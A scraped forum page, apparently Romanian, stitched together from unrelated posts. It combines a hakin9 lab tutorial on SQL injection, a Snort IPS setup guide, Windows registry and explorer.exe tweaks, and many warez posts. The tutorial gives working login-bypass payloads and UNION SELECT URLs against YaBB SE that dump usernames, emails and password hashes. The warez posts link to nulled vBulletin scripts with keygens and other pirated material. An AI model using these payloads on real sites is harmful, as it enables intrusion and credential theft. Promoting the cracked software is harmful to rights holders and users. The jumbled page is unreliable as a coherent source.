zbeng

I. Manipulating login.php Script [01] Open the terminal and type (without prepending prompt symbols): $ su - # sql_tutorial_start These commands will start all needed services in the background. [02] Open the browser and check http://localhost/phpmyadmin/. [03] Have a look at the databse userdb that our login.php script is accessing [04] Have a look at login.php script. To do this, open another terminal and type: $ vi login.php or, in case you are not familiar with vi text editor, you can use more user friendly mcedit (or any other editor you wish): $ mcedit login.php [05] If you want to see the submitted query to get more information, delete prepending slashes in echo "$query " line: [06] Now open the browser again and go to http://localhost/login.php. You will see a page similar to the one below: SQL_tutorial_02 [07] Enter username admin which we know is existing. As you can see, we cannot login due to the missing password. [08] Now append a ' to the username to see if the script is vulnerable. The script generates an error, so we can move on. [09] Enter admin' OR 1=1 as username and see what happens. [10] Out of the query we can see that we have a closing single quote that isn't opened. [11] Enter admin 'OR 1='1 as username. Now the query is valid and we're in: [12] To advance the attack you might whant to check out the /* to comment out all the following. Enter admin' /*" as username then and check the query: SELECT * FROM `userlist` WHERE `username` = 'admin' /*' AND `password` = '' is what we entered, but only the part before /* is proccessed by the database. This is why the statement is valid. II. UNION SELECT [01] We installed YABBSE under http://localhost/yabbse/. The vulnerable script is located at http://localhost/yabbse/SSI.php. [02] Open the script in the console by typing: $ vi /yabbse/SSI.php or use whichever editor you want. Now move to the line 222, where the query we are trying to manipulate is located. [03] To get into the function recentTopics, call http://localhost/yabbse/SSI.php?function=recentTopics. [04] In this query a variable $ID_MEMBER is processed. This is where we try to break in. We should now move to http://localhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1' (notice the single quote at the end). This results in an error, so the script is potentially vulnerable to SQL Injection attack. [05] Out of the error message we can see that a table lmr is referenced in the original query that is now missing. We search for the original query in the editor and append the missing part to our query. [06] Go to http://localhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER= 1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1) UNION SELECT ID_MEMBER, memberName FROM yabbse_members /*. Out of the error message, we can see that the inserted SELECT statement doesn't have the equal number of queries. We have to add something to make it equal then. [07] Move your browser to http://localhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER= 1 OR 1=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT memberName, emailAddress, passwd, null, null, null, null, null, null, null, null, null FROM yabbse_members /*. Now we seem to have a valid query, but can only see the e-mail address: [08] Have a look at line 223 and below. There is a HTML parser to be found that shows the result of our query. So what we have to do now is to mix around our null statements. [09] Move to http://localhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT null, memberName, null, emailAddress, null, passwd,null,null,null,null,null,null FROM yabbse_members /*. There we are - we have managed to obtain all information we wanted: [10] Return to a terminal opened at the beginning (or open a new one) and issue commands: $ su - # sql_tutorial_stop This will stop all services needed to pass through this tutorial.

The tutorial deals with the installation, configuration and the maintenance of an IPS system based on Snort. Testing Environment The testing environment used in this tutorial has been composed of the following software: 1. hakin9 live 2.8-ng 2. a computer equipped with three network interface cards: eth0, eth1, eth2 Purpose After completing the exercises below, the user will have gained knowledge regarding the configuration and maintenance of an IPS system based on the Snort program. Step 1. Configuring the network bridge We are building a network bridge which will be used as an IPS system. We assign interfaces eth0 and eth1 to the br0 interface which is our bridge and configure eth2 which will administrate the entire machine. For that purpose we use the makeBridge.sh and eth2Config.sh shell scripts. Step 2. Configuring Snort The only step which we have to take is the modification of the snort configuration file /etc/snort/snort.conf. We don't have any attack signatures, so we turn all lines into comment lines (by adding a # at the beginning of each line): include $RULE_PATH/*.rules The lines can be found at the end of the configuration file. We also change the line: var RULE_PATH ../rules into var RULE_PATH /etc/snort/rules and add: config layer2resets We then create our own rules by adding appropriate lines to the /etc/snort/rules/test.rules file. Now all we have to do is let snort know about our rules file; in the /etc/snort/snort.conf file, we create the line: include $RULE_PATH/test.rules That's it! Step 3. Configuring iptables We will configure iptables in a way which will force all received packets to go through the Snort system. We do this with the iptabConfig.sh shell script. We can also modify the script in a way which would make Snort go after only those packets which have been addressed to WWW servers: iptabConfigWWW.sh Step 4. Testing the IPS Once we have Snort installed and all rules configured as described above, we can start testing our settings. If a packet is sent from the network to port 22 in our computer the system will register the following message in its logs: [**] [1:0:0] Port 22 Connection Initiated [**] [Classification: Attempted User Privilege Gain] [Priority: 1] 09/19-20:19:07.436667 192.168.0.2:1049 -> 193.219.28.2:22 TCP TTL:128 TOS:0x0 ID:702 IpLen:20 DgmLen:48 DF ******S* Seq: 0x29821EB9 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK An Echo Request will result in the following: [**] [1:0:0] ICMP Echo Request [**] [Classification: Attempted User Privilege Gain] [Priority: 1] 09/19-20:12:57.194560 192.168.0.2 -> 212.76.32.1 ICMP TTL:128 TOS:0x0 ID:420 IpLen:20 DgmLen:60 Type:8 Code:0 ID:512 Seq:256 ECHO If Snort finds a packet corresponding to the third rule, the result will be as follows: [**] [1:0:0] DNS Request [**] [Classification: Attempted User Privilege Gain] [Priority: 1] 09/19-20:21:12.989775 192.168.0.2:1041 -> 212.76.39.45:53 UDP TTL:128 TOS:0x0 ID:818 IpLen:20 DgmLen:59 Len: 31 Step 5. Installing official rules The first task one has to do is to obtain current rules from the Snort homepage. They are available on The'>http://www.snort.org/rules/ The downloaded archive should be uncompressed into the /etc/snort/ directory. The default action undertaken by Snort for all rules is the registering of an attack (the alert directive). Since we are going to block attacks, we must modify all rules appropriately by changing the alert action to drop. We can accomplish this by using the chRules.sh shell script. The last thing which we need to do before restarting Snort is yet another modification of the /etc/snort/snort.conf file (we must uncomment corresponding lines to which we previously added the # sign). If all went well, the time has come to start our system: # snort -Q -D -c /etc/snort/snort.conf -l /var/log/snort Step 6. Automatic Actualizations of the Snort System The first thing is the installation of the Oinkmaster program: $ tar zxvf oinkmaster-1.2.tar.gz $ cd oinkmaster-1.2 # cp oinkmaster.pl /usr/local/bin/ # cp oinkmaster.conf /etc/ Now we must configure the program. We will need the code generated for rules meant for registered users. We register at the Snort homepage and generate the appropriate code. We choose which rules we want to actualize by editing the oinkmaster.conf file. We uncomment the line: # url = by'>http://www.snort.org/pub-bin/oinkmaster.cgi/oinkcode/snortrules-snapshot-CURRENT.tar.gz by removing the # sign at its beginning and replace oinkcode by the code generated for us by the script on the Snort homepage. There is still one more oinkmaster.conf modification to make. We add the line: modifysid * "^alert" | "drop" Due to this last modification the default action for all actualized rules will be to drop all suspicious packets rather than inform about them. Now all we have to do is start the program by: oinkmaster.pl -o /etc/snort/rules/

'>http://share.urbanfriends.us/savefile_php/uploads/fa8de5b020.rar http://rapidshare.com/files/3327891/93_vbulletin.new.rar.html

Item number: 10813 Type: FLASH SITE Author: Cowboy Downloads: 4 SOURCES AVAILABLE: .PSD; .HTML; .FLA; .SWF; SOFTWARE REQUIRED: Adobe Photoshop 7+; Macromedia Dreamweaver, Adobe GoLive or Microsoft Frontpage 2003; Macromedia Flash MX+; http://rapidshare.com/files/2227114/10813.[url]www.ewares.org.rar.html[/url]

390 poze cu BMW de o mare calitate DOWNLOAD http://rapidshare.com/files/3309855/bmw_collection.part01.rar.html [url]http://rapidshare.com/files/3309854/bmw_collection.part02.rar.html[/url] [url]http://rapidshare.com/files/3309853/bmw_collection.part03.rar.html[/url] [url]http://rapidshare.com/files/3309852/bmw_collection.part04.rar.html[/url] [url]http://rapidshare.com/files/3308848/bmw_collection.part05.rar.html[/url] [url]http://rapidshare.com/files/3308608/bmw_collection.part06.rar.html[/url] [url]http://rapidshare.com/files/3308354/bmw_collection.part07.rar.html[/url] [url]http://rapidshare.com/files/3308081/bmw_collection.part08.rar.html[/url] [url]http://rapidshare.com/files/3307850/bmw_collection.part09.rar.html[/url] [url]http://rapidshare.com/files/3307587/bmw_collection.part10.rar.html[/url] [url]http://rapidshare.com/files/3307371/bmw_collection.part11.rar.html[/url] [url]http://rapidshare.com/files/3307098/bmw_collection.part12.rar.html[/url] [url]http://rapidshare.com/files/3306778/bmw_collection.part13.rar.html[/url] [url]http://rapidshare.com/files/3306407/bmw_collection.part14.rar.html[/url] [url]http://rapidshare.com/files/3305976/bmw_collection.part15.rar.html[/url] [url]http://rapidshare.com/files/3305660/bmw_collection.part16.rar.html[/url] [url]http://rapidshare.com/files/3305325/bmw_collection.part17.rar.html[/url] [url]http://rapidshare.com/files/3305029/bmw_collection.part18.rar.html[/url]

http://rapidshare.com/files/3304069/tm_9485.rar.html

Beautifully designed flash clocks. Must have for web site developers... Link: http://rapidshare.com/files/3308366/129_Flash_Clocks_SpyJoe.rar Password: SpyJoe Size: 1.9

in curand va fi postat si aici asteptati...nu muriti pt 3-4 zile;)

lasal

a mai fost postat;)

http://www.i-file.org/?d=BA67B2D6 http://rapidshare.com/files/3218617/ebony.zip.html

Blogsystem.v1.4.PHP.NULL-DGT cpengine.v1.3.PHP.NULL-DGT Geek.Article.and.Review.System.v2.0.1.PHP.NULL-DGT ImpEx.1.115(b1.70).PHP.NULL-DGT Koobi.Pro.v5.8.PHP.NULL-DGT MyWebFTP.Pro.v5.3.1.PHP.NULL-DGT PhotoPost.vBGallery.v1.1.PHP.NULL-DGT PhotoPost.vBGallery.v2.1.PHP.NULL-DGT vBulletin.v2.3.11.PHP.NULL-DGT vBulletin.v3.0.16.incl.KeyGen.PHP.NULL-DGT vBulletin.v3.0.16.PHP.NULL-DGT vBulletin.v3.5.6.incl.KeyGen.PHP.NULL-DGT vBulletin.v3.5.6.PHP.NULL-DGT vBulletin.v3.6.3.incl.KeyGen.PHP.NULL-DGT vBulletin.v3.6.3.PHP.NULL-DGT DOWNLOADD [url]http://rapidshare.com/users/N22XRD[/url]

The timeless art of handwriting Over 50 Fonts in True and Open type Download: http://rapidshare.com/files/3175024/niF.rar

Over 680+ megabytes of 16 bit, 44 khz .Wav sample loops ready for use in Acid Pro or any other software/machine that supports it. CD is Called Urban Joints Pro, I've lost the original casing so if you wanna know who it's produced by I'll have to get back to ya on that one. Samples are orgaized not by BPM but by the type of loop, such as: - Basses - Chords & Keys - Drums - Effects - Hits & Stabs - Instruments - Loops - Synths & Pads - Vocals Enjoy everyone. download: http://rapidshare.de/files/19332161/Urban_Joints_Pro.part1.rar.html [url]http://rapidshare.de/files/19333163/Urban_Joints_Pro.part2.rar.html[/url] [url]http://rapidshare.de/files/19334218/Urban_Joints_Pro.part3.rar.html[/url] [url]http://rapidshare.de/files/19335339/Urban_Joints_Pro.part4.rar.html[/url] [url]http://rapidshare.de/files/19336237/Urban_Joints_Pro.part5.rar.html[/url] CB Productions' David Burell (R. Kelly, Whitney Houston, Mariah Carey) brings you deep inside the hip-hop chart zone, delivering tracks that'll keep bumpin' and jumpin'. da Joints loops will help your tunes turn the heads of even the most jaded A&R rep. Basses, beats, keys, licks, guitars, fx, and more are all there in a construction kit format, delivering everything you need to bust out of the studio and onto the charts. Top Features: - Acidized WAV - professionally recorded and meticulously edited Download: http://rapidshare.de/files/19337489/Da_Jointz.part1.rar.html [url]http://rapidshare.de/files/19338822/Da_Jointz.part2.rar.html[/url] [url]http://rapidshare.de/files/19339265/Da_Jointz.part3.rar.html[/url]

Demo: http://www.boxedart.com/phpshop/info.php/mp_/17170 Download: http://www.megaphile.com/file/49/TGraphxEvil.zip.html Demo: http://www.boxedart.com/phpshop/info.php/mp_/16397 Download: http://www.megaphile.com/file/50/FFLegendaryGamers.zip.html Demo: http://www.boxedart.com/phpshop/info.php/mp_/16321 Download: http://www.megaphile.com/file/51/FTLastLevel.zip.html

"pacat" ca e in engleza

Logon Screen Windows XP Pirated Edition Download: http://wallpapers-n-etc.com/download.php?view.862 You have to sign-up to download.

merge;) acuma iti fac pe .de

mie mi se par 2 templete super faine;) Download: [url]http://rapidshare.com/files/686140/an_silver_griffin.uha[/url] Download: [url]http://rapidshare.com/files/687744/an_robotics.uha[/url] Pass:enem

Html, font, psd (some sliced) 95 MB http://rapidshare.com/files/2941115/73_Liquid_T.rar.html

http://rapidshare.com/files/2897422/ROUNDer.rar.html

StockLayout Brochure Template 2 Page : Internet Service Company Full template: 3 EPS, 3 Jpeg, 5 Pdf, 1 Indd Page size: 8.5x11 Fold type: Tri Fold Size: 4.2 MB Download: [url]http://rapidshare.com/files/2806325/bro1.rar[/url]

TM 10039 http://rapidshare.com/files/2827913/100enem39.uha

Xmas Cards Vol. 2 10.1 Mb | 10 JPG | RAR | Hi-Res | 1600 x 1000 pixels Download: http://rapidshare.com/files/2760654/xmascards2_edi67_.rar

#1 //---------------------------------------------------------------------------- // Change max IE connections to 50, if you have high-speed Internet it // speeds things up a little more // Works Cited: http://weblogs.asp.net/dwanta/archive/2004/03/31/105050.aspx //---------------------------------------------------------------------------- [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings] "MaxConnectionsPerServer"=dword:00000032 "MaxConnectionsPer1_0Server"=dword:00000032 //--------------------------------------------------------------------------------// #2 //---------------------------------------------------------------------------- // Change the Start Button Text // find pictures in folder /startButtonPics/ // Works Cited:http://www.winguides.com/registry/display.php/791/ //---------------------------------------------------------------------------- Manually changing the Start button requires the use of a binary file editor (or hex editor) to alter a critical Windows system file, it is therefore not recommended for inexperienced users. This method has been successfully tested on Windows 95, 98, ME, 2000 and XP and therefore should be quite safe, although we do not accept any responsibility for system problems or data loss. As mentioned before you will need to have a hex editor installed, there are many different products available and if you don't have one already a quick search of a shareware site should provide many choices, for this tweak we only require basic features. 1. The file that needs to be changed is Windows Explorer, and it is essential to make a backup before you modify anything. "Explorer.exe" can be found in the Windows directory, usually C:WINDOWS for Windows 95, 98, Me & XP and C:WINNT for Windows NT/2000. Make a copy of "Explorer.exe" and place it into another directory, C:BACKUP might be a good choice. 2. Make another copy of the original "Explorer.exe" and name it "Explorer1.exe", then open "Explorer1.exe" in your hex editor. 3. You now need to find the word "Start", although there are many entries for "Start" in the file only one is used for to label the Start button. Use the search function in the hex editor to find all the strings equal to "S t a r t" which is represented as "53 00 74 00 61 00 72 00 74" in hex values. As there are many different "Start" strings keep searching until you find one located just before this text "There was an internal error and one of the windows you were using has been closed.". Below is a list of offsets to help you locate the correct text. * Windows 98 Offset: 0x00028D6E - 0x00028D76 * Windows NT4 Offset: 0x00028BEE - 0x00028BF6 * Windows ME Offset: 0x00033DDE - 0x00033DE6 * Windows 2000 Offset: 0x0003860E - 0x00038616 * Windows XP (Enhanced Start Menu) Offset: 0x000412B6 - 0x000412BE * Windows XP (Classic Start Menu) Offset: 0x0004158A - 0x00041592 * Windows XP SP1 (Enhanced Start Menu) Offset: 0x0004208E - 0x00042096 * Windows XP SP1 (Classic Start Menu) Offset: 0x0004259A - 0x000425A2 4. Once you have located the string, you can then replace the letters in "Start" with five other characters. You must use exactly five characters, if the word you want to use is less, replace the remaining characters with the space key. In this example we have replaced "Start" with "Guide", alternatively a three-letter word would look like "A B C" (note the spaces). 5. Now save the modified "Explorer1.exe" in the Windows directory, and confirm that you now have the two Explorer files in the Windows directory, they both should be the same file size but have different modified dates. 6. The next step is different depending on your operating system. Only do the step required for your version. * Windows 95, 98 & ME Exit to DOS (or use a boot disk for Windows ME) and at the command prompt change to the Windows directory and rename "explorer.exe" to "explorer.old". Then copy the newly modified Explorer "explorer1.exe" to "explorer.exe". Do a directory listing and confirm that "explorer.exe" has the most recent modified date and time. Restart the computer and Windows should reload along with the new Start button text. * Windows NT First close any open applications and open a new Command Prompt window, then switch back to the GUI and open the Task Manager. Find the "explorer.exe" process and end it, you should now be left with only the command prompt and task manager. Switch back to the command prompt and change to the Windows directory, rename "explorer.exe" to "explorer.old", and copy the newly modified Explorer "explorer1.exe" to "explorer.exe". Do a directory listing and confirm that "explorer.exe" has the most recent modified date and time. Switch back to Task Manager and launch a "New Task" called "explorer.exe" this should reload the shell along with your modified "Start" button. * Windows 2000 and XP Open your registry editor and find the key [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]. Find the value named "Shell" and change it to equal the filename of the new explorer "explorer1.exe". Exit your registry editor and restart Windows for the change to take effect. To reverse the change, modify the value of "Shell" and set it back to "explorer.exe". | Name Type Data | | (Default) REG_SZ (value not set) | | Shell REG_SZ explorer1.exe | - | HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon | - 7. If everything has gone successfully you will now have a new Start button, and also hopefully learnt something about the Explorer file structure. If you do have problems replace the faulty Explorer with the backup made during the first step. //----------------------------------------------------------------------------------// #3 //--------------------------------------------------------------- // Display a banner each time Windows boots //--------------------------------------------------------------- 1. Start -> Run 2. Type regedit 3. Go to the key HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionWinLogon 4. Create a new string value in the right pane named LegalNoticeCaption and enter the value that you want to see in the menubar 5. Create a new string value and name it LegalNoticeText. Modify it and insert the message you want to display each time Windows boots //---------------------------------------------------------------------------------// #4 //--------------------------------------------------------------- // Shutting down Windows the fastest way //--------------------------------------------------------------- 1. Start -> Run 2. Type rundll.exe user.exe,exitwindows //----------------------------------------------------------------------------------// #5 //----------------------------------------------------------------- // registry hack which will allow you to see your opponents' cards //----------------------------------------------------------------- Launch REGEDIT.EXE and navigate to HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Applets Hearts. NOTE: You may have to create the Hearts key under Applets In the right-hand pane, create a new String Value. Immediately rename it to "ZB" (without the quotes); give it a value of "42" (again, sans quotes). The next time you're in a game of Hearts, press CTRL + SHIFT + ALT + F12.